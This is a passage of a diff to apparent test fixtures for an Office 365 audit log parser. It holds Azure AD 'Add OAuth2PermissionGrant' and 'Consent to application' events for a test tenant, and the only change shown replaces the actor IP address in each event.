Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canar
y.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\
"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -23793,9 +23793,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:42",
 "ExtendedProperties": [
 {
@@ -24029,7 +24029,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canar
y.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\
"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -24059,9 +24059,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-11T16:45:42",
 "ExtendedProperties": [
 {
@@ -24295,7 +24295,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ConsentContext.IsAdminConsent\\\",\\\"ConsentContext.IsAppOnly\\\",\\\"ConsentContext.OnBehalfOfAll\\\",\\\"ConsentContext.Tags\\\",\\\"ConsentAction.Permissions\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"a
dditionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: 
User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 